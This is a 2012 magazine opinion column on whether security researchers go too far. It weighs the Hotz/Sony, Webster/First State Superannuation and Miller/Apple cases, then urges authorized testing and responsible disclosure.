Magazine

Can a computer security researcher go too far?

Ezine

This article can also be found in the Premium Editorial Download "Information Security magazine: Combat the latest malware threats with effective antimalware planning."

Download it now to read this article plus other related content.

Centuries of literary works and real-life scenarios have depicted the battle of good versus evil:  God versus Satan; Hamlet vs. Claudius; Darth Vader vs. Luke; Cubs vs. Sox; NBA players

    Requires Free Membership to View

vs. NBA owners. In the security community, it’s the Security Researcher vs. the Corporation.  The reality is that in most of these scenarios, the characters are simply flawed or have differing agendas, neither of which are truly good or evil.

I have been following the security community for 15 years and I have seen the good, the bad and the ugly associated with researchers releasing their findings and the corporate responses.  It is a point of constant conflict in the industry.

A few cases have led me to question whether computer security researchers can go too far and whether the companies they research really are the bad guys:  George "GeoHot" Hotz “mod’ing” the Sony PlayStation console; Patrick Webster vs. First State Superannuation in Australia; and  Charlie Miller vs. Apple. In each case, I draw an analogy to buying a riding lawn mower.  I fully expect if I  buy a riding lawn mower I am within my rights as owner of the product to  “mod” (modify) it to the point where I can race it and win.  Providing I do not harm others who  buy or use the same product and I use the product within the law, this is my right as owner. I also fully expect if I buy a riding lawn mower it will not have a series of conditions created during the manufacturing process, unbeknownst to the manufacturer and outside its typical QA process that will cause me to inadvertently drive it through my picture window. Finally, I do not expect someone to sneak into the store where my mower is sold, soup it up  without my knowledge and wait until I drive it through my picture window in the spirit of proving it can be done.

In the case of George Hotz and Sony, I believe consumers are well within their rights to “mod” any product they purchase for whatever reason they see fit.  This is what you pay for, you own the product;  this is not a case of stealing the code and reselling it, but of retrofitting it for your needs. 

In the case of Patrick Webster and First State Superannuation (FSS), I am obligated to point out the concept of “authorized testing.”  Patrick was not authorized to conduct a vulnerability test against this website, but in the spirit of research he conducted testing and (inadvertently?) downloaded personally identifiable information (PII).  According to The Sydney Morning Herald , he wrote a “..script that cycled through each ID number and pulled down the relevant report to his computer.”

In information security, unauthorized testing has always been a big no-no. How do we know Webster is altruistic and had no intention of using this PII for unlawful or unethical purposes?  Because he said so, reported it in a responsible manner and was nice about it?  FSS couldn’t possibly assume Webster was being responsible and trust him;  it would be irresponsible of FSS and its obligation to its customers.  FSS was obligated to determine the extent of the breach (yes, it was a breach) and address the repercussions. In this case, was it necessary for Webster to download the data to prove the flaw?

The case of Miller and Apple’s App Store is a different story.  According to a report in  The Huffington Post, “He created a secret application that he believed could download malware onto iPhones and iPads, and got it approved for distribution in Apple's App Store.”  Thus, he circumvented the Apple QA process to prove the vulnerability could be exploited. The difficult part about this case is that Miller couldn’t test and prove this flaw without circumventing the process.  While his intentions were likely non-malicious, we can only assume this to be true based on trusting him personally. This defies a fundamental principal in information security:  Never trust the human element. How can we possibly change that rule for a security researcher?

Here are three simple points security researchers should keep in mind:

  1. Please do not expect users, society, or companies to trust you.  This defies a fundamental principle of information security.  Respect this principle and do not expect exceptions on the basis of research.
  2. Recognize there is a concept of authorized testing.  It is not okay to randomly test public sites that contain others’ private information in the spirit of research.  Users have rights and testing may infringe on those rights. Companies that disparage this behavior are not always wrong; they may simply be protecting their customers.
  3. Do not assume excessive lengths are necessary to prove a point.  Be patient and provide companies with the benefit of the doubt in accordance with many of the responsible disclosure policies publicly available.  If the six to eight week mark doesn’t work, then please refrain from downloading all of the data; simply run a few individual exploits and disclose the vulnerability to an organization such as CERT and let it facilitate.

At the end of the day, I do not believe either researchers or the companies they research are good or evil. Both have differing agendas and are serving the interests of those they support.  We all need to respect each other’s place in society and understand we may not agree on all topics. There is no such thing as good and evil, only flawed characters who are doing their best.

About the author:
Elizabeth Martin has 15 years of experience in the information security, compliance, and risk management industry.  She has extensive experience in the automotive, retail, financial, healthcare, government, and managed security services verticals. Send comments on this column to feedback@infosecuritymag.com.

This was first published in February 2012

There are Comments. Add yours.

 
TIP: Want to include a code block in your comment? Use <pre> or <code> tags around the desired text. Ex: <code>insert code</code>

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy
Sort by: OldestNewest

Forgot Password?

No problem! Submit your e-mail address below. We'll send you an email containing your password.

Your password has been sent to: